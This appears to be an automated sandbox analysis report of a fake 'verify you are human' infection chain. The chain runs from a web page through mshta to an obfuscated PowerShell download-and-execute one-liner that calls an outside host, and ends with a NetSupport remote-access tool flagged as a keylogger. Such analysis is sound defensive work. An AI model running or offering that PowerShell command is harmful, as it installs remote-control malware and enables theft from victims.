                                                                                                                                                              Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.16 | 49720 | 162.19.58.157 | 443 | 6832 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:45:34 UTC | 587 | OUT | GET /t8b1Qdw/1q.png HTTP/1.1
                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://inspyrehomedesign.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
2024-10-28 18:45:34 UTC | 378 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:34 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 1606
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Sun, 22 Sep 2024 08:57:32 GMT
                                                                                                                                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                              Cache-Control: max-age=315360000
                                                                                                                                                              Cache-Control: public
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                                                              Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.16 | 49722 | 169.197.85.95 | 443 | 6832 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:45:35 UTC | 346 | OUT | GET /t8b1Qdw/1q.png HTTP/1.1
                                                                                                                                                              Host: i.ibb.co
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
2024-10-28 18:45:35 UTC | 378 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:45:35 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 1606
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Sun, 22 Sep 2024 08:57:32 GMT
                                                                                                                                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                              Cache-Control: max-age=315360000
                                                                                                                                                              Cache-Control: public
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                                                              Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.16 | 49723 | 172.202.163.200 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:46:04 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=raZlZsppxEvfrBh&MD=OrKVw8+R HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                              Host: slscr.update.microsoft.com
2024-10-28 18:46:04 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Expires: -1
                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                              MS-CorrelationId: c23faf69-c0c4-4e57-bf8d-cccb78267141
                                                                                                                                                              MS-RequestId: abd692b7-9da2-438e-95f8-d9365aac8573
                                                                                                                                                              MS-CV: KMbLgFMLH0O3kZG5.0
                                                                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:04 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Content-Length: 30005


                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                              10 | 192.168.2.16 | 49724 | 166.1.160.75 | 443 | 7848 | C:\Windows\System32\mshta.exe
                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                              2024-10-28 18:46:12 UTC | 340 | OUT | GET /Ray-verify.html HTTP/1.1
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                              Host: inspyrehomedesign.com
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              2024-10-28 18:46:12 UTC | 279 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:12 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 10478
                                                                                                                                                              Connection: close
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:55:44 GMT
                                                                                                                                                              ETag: "28ee-624f7fad44000"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              2024-10-28 18:46:12 UTC | 10478 | IN | Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><META NAME='GENERATOR' Content='The source code of this page is encrypted with HTML Guardian, the world's standart for website protection. Visit http://www.protware.com for details'><met



                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:14:45:11
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:1
                                                                                                                                                              Start time:14:45:12
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1896,i,2740781035066481159,16273883810358689985,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:14:45:13
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://inspyrehomedesign.com/Ray-verify.html"
                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:11
                                                                                                                                                              Start time:14:46:10
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 3293''
                                                                                                                                                              Imagebase:0x7ff60c100000
                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                              MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:12
                                                                                                                                                              Start time:14:46:11
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                                                                                                                                              Imagebase:0x7ff7582a0000
                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:13
                                                                                                                                                              Start time:14:46:11
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff6684c0000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:14
                                                                                                                                                              Start time:14:46:15
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                                                                                                                                              Imagebase:0x7ff79a970000
                                                                                                                                                              File size:35'840 bytes
                                                                                                                                                              MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:15
                                                                                                                                                              Start time:14:46:16
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\bpsFyf
                                                                                                                                                              Imagebase:0x7ff6fd780000
                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:16
                                                                                                                                                              Start time:14:46:16
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:attrib +h C:\Users\user\AppData\Roaming\bpsFyf
                                                                                                                                                              Imagebase:0x7ff7fdf20000
                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:20
                                                                                                                                                              Start time:14:46:27
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                              Imagebase:0x7ff61d1e0000
                                                                                                                                                              File size:71'680 bytes
                                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:21
                                                                                                                                                              Start time:14:46:34
                                                                                                                                                              Start date:28/10/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\bpsFyf\client32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\bpsFyf\client32.exe"
                                                                                                                                                              Imagebase:0xd10000
                                                                                                                                                              File size:120'288 bytes
                                                                                                                                                              MD5 hash:EE75B57B9300AAB96530503BFAE8A2F2
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.2405808800.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000000.1975726137.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000000.1975726137.0000000000D1F000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe, Author: Joe Security
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 13%, ReversingLabs
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              Reset < >
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753176795.0000025C98486000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98486000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98486000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 470f8003a2280efb8a85aaf11524de6dd5d9ed2339bdb3fb46ecfecfb8a350fe
                                                                                                                                                                • Instruction ID: b64934c4bdc6a461ae54f48410479c8b1748399c0bc269c68b9f6d8d85d27d3a
                                                                                                                                                                • Opcode Fuzzy Hash: 470f8003a2280efb8a85aaf11524de6dd5d9ed2339bdb3fb46ecfecfb8a350fe
                                                                                                                                                                • Instruction Fuzzy Hash: 9751F15011EBC51FC7A6977C58AA6F67FE0DF1B210B1808CED0C9CF9A3D018985AC35A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753176795.0000025C98486000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98486000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98486000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7581baa57a302103d4aa8c3cf9027a97514bb7b839cbc7e4b19859b555f7bbac
                                                                                                                                                                • Instruction ID: 97a3812351a2b0c2571ed4c6c034697fff15af32a4e642c11de61a9c62066b47
                                                                                                                                                                • Opcode Fuzzy Hash: 7581baa57a302103d4aa8c3cf9027a97514bb7b839cbc7e4b19859b555f7bbac
                                                                                                                                                                • Instruction Fuzzy Hash: 0911E1A121DB880FDB98E63C9469A757BD0DF69314F4404DEE085CB2A2E424EC82C38A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753261441.0000025C98481000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98481000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98481000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9f1cbebfe36d22b0706020cafc36a86d290b3a2ea38b71e1cec28c3ffda9a938
                                                                                                                                                                • Instruction ID: 752b44dfaf469ce9382a1c5f46fdced184170793645e259864460362c5f99246
                                                                                                                                                                • Opcode Fuzzy Hash: 9f1cbebfe36d22b0706020cafc36a86d290b3a2ea38b71e1cec28c3ffda9a938
                                                                                                                                                                • Instruction Fuzzy Hash: F8E04F5151DFC80FEB5A5374187D1747EE1DF56250B9408CFD89ACB4A3DC2408818316
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753224248.0000025C98484000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98484000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98484000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f3a31a653940f2cd1f2bac128e10a96e544339aff0aba06e2f8f8b97b4691e81
                                                                                                                                                                • Instruction ID: c7c2afde1b6d3ef774ef234a620332e7dedf8bbd4c895b1d765bc1ec3eab262a
                                                                                                                                                                • Opcode Fuzzy Hash: f3a31a653940f2cd1f2bac128e10a96e544339aff0aba06e2f8f8b97b4691e81
                                                                                                                                                                • Instruction Fuzzy Hash: BDB0125280CF804EF32519700D1C12425818B553F173509C35805E7062ED204D4001A1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:4.6%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:35.7%
                                                                                                                                                                Total number of Nodes:14
                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                execution_graph 6467 7ffeb71182c1 6469 7ffeb71182cf GetFileAttributesW 6467->6469 6470 7ffeb7118376 6469->6470 6471 7ffeb7118b1a 6472 7ffeb712ce00 ComputeAccessTokenFromCodeAuthzLevel 6471->6472 6474 7ffeb712ceae 6472->6474 6458 7ffeb71134ac 6459 7ffeb71134b5 6458->6459 6462 7ffeb7112610 6459->6462 6461 7ffeb7113533 6463 7ffeb7112615 6462->6463 6464 7ffeb712d443 GetSystemInfo 6463->6464 6466 7ffeb712d3b0 6463->6466 6465 7ffeb712d47e 6464->6465 6465->6461 6466->6461

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2022643969.00007FFEB7110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7110000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7110000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 31276548-0
                                                                                                                                                                • Opcode ID: 454b5ee7c7e2f3d61803342ca335c442d90d7a0b9206a1f78d4074454ad86f46
                                                                                                                                                                • Instruction ID: 1c115e247227888313d3944c8ddbd2ad1231d5e17e05dba3979936cff2a5384b
                                                                                                                                                                • Opcode Fuzzy Hash: 454b5ee7c7e2f3d61803342ca335c442d90d7a0b9206a1f78d4074454ad86f46
                                                                                                                                                                • Instruction Fuzzy Hash: BB41247190CA4D4FEB58DB6CC84A6F97BE0EF55320F04027FE18DC35A2DB64645A8B91

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2022643969.00007FFEB7110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7110000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7110000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: 49c8fd36a7a7a35ac05a087e695f93dc2a18948933ca570b0c29358f91e7c00a
                                                                                                                                                                • Instruction ID: 0be6820e2487ca8371e655da0811ca9c568fbd74a9a33f3e5bece790568e7e65
                                                                                                                                                                • Opcode Fuzzy Hash: 49c8fd36a7a7a35ac05a087e695f93dc2a18948933ca570b0c29358f91e7c00a
                                                                                                                                                                • Instruction Fuzzy Hash: 6841053190DA8D4FDB5ADB6C88456E9BFE0EF56320F08427BC049D79A2CF74A815C7A1

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2022643969.00007FFEB7110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7110000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7110000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
